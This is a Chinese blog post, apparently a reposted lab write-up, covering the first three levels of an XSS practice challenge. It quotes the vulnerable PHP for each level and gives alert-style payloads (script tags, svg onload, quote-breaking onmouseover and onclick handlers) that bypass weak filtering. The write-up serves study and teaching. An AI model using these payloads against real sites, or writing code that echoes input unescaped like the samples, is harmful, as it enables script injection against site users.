xss挑战之旅

admin
admin
admin
102359
文章
87
评论
2021年11月4日12:00:50评论87 views字数 1721阅读5分44秒阅读模式

为什么我要受这么多的磨难与痛苦,因为老天爱我比别人多亿点啊!

一个资质平庸却努力上进的普通人,我希望,当我回首往事时,不因虚度年华而悔恨,也不因碌碌无为而羞愧,我可以对自己说:我,不负此生。

level1

url:
http://xxx.xxx.xxx/level1?name=test
关键代码分析
ini_set("display_errors", 0);$str = $_GET["name"];echo "<h2 align=center>欢迎用户".$str."</h2>";
输入test<,可以看到没有任何过滤
xss挑战之旅
通过url进行控制,常用payload
<script>alert('xss')</script><svg/onload=alert('xss')>
xss挑战之旅
<script>prompt('xss')</script>
xss挑战之旅
<script>confirm('xss')</script>
xss挑战之旅

level2
url:
http://xxx.xxx.xxx/level2?keyword=test
关键代码分析
$str = $_GET["keyword"];echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>"."<center><form action=level2.php method=GET><input name=keyword  value='".htmlspecialchars($str)."'><input type=submit name=submit value=搜索 />
使用GET方法,从url中接受一个keyword搜索参数,此处用到了一个过滤函数htmlspecialchars(),这个函数把预定义的字符转换为HTML实体
本题是搜索型xss
输入常见的payload:
<script>alert('xss')</script>
没有弹窗,审查元素可以看到的输入的XSS语句被赋值给value并且在input标签里,所以我们需要闭合value和input标签才可以正常弹窗
xss挑战之旅
输入框构造常用payload:
" onmouseover=alert(/xss/)>click
当鼠标移动到搜索框就会触发弹窗
xss挑战之旅
审查元素,可以看到我们的输入变成了
xss挑战之旅
"><script>alert(/xss/)</script>
xss挑战之旅
"><script>confirm(/xss/)</script>
xss挑战之旅
"><script>prompt(/xss/)</script>
xss挑战之旅
level3
url:
http://xxx.xxx.xxx/level3?keyword=wait
关键源代码分析
$str = $_GET["keyword"];$str2=str_replace(">","",$str);$str3=str_replace("<","",$str2);echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center><form action=level3.php method=GET><input name=keyword value="'.$str3.'"><input type=submit name=submit value=搜索 />
发现过滤了 < 和 >使用的str_replace函数,需要用 " 闭合value标签。注意:str_replace函数是区分大小写的,str_ireplace函数不区分大小写,所以有时候我们还可以利用大小写绕过。
构造payload:
' onclick=alert(/xss/)//
输入payload后,单击搜索框,就会触发弹窗
xss挑战之旅
审查元素发现我们的输入变成了
xss挑战之旅
免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。
转载声明:进德修业行道 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。

原文始发于微信公众号(进德修业行道):xss挑战之旅

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月4日12:00:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   xss挑战之旅https://cn-sec.com/archives/612344.html

发表评论

匿名网友 填写信息